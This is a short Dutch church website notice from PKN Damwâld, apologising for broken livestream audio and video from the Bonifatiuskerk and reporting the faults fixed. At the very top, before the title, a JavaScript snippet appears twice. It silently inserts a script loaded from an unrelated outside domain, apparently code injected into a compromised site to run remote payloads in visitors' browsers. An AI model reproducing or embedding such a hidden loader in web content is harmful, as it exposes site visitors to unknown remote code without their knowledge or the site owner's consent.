;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Audiosignaal en livestream vanuit de Bonifatiuskerk - PKN Damwâld

Audiosignaal en livestream vanuit de Bonifatiuskerk

Gepubliceerd op: maandag 15 augustus 2022

Zoals u wel vernomen zult hebben, zijn de livestream uitzendingen van de laatste diensten uit de Bonifatiuskerk niet vlekkeloos verlopen. Onze excuses hiervoor.

We zijn druk bezig geweest om één en ander te herstellen. Het audiosignaal is een tijdlang niet te ontvangen geweest, maar dit werkt weer. Ook het feit dat men de dominee kon horen bij het zingen is – zoals het nu lijkt – verholpen. De livestream uitzending van 31 juli ging ook helemaal verkeerd: beeld op de kop en geen geluid. Deze storing is nu ook opgelost ! De livestream werkte op 14 augustus 2022 in ieder geval perfect!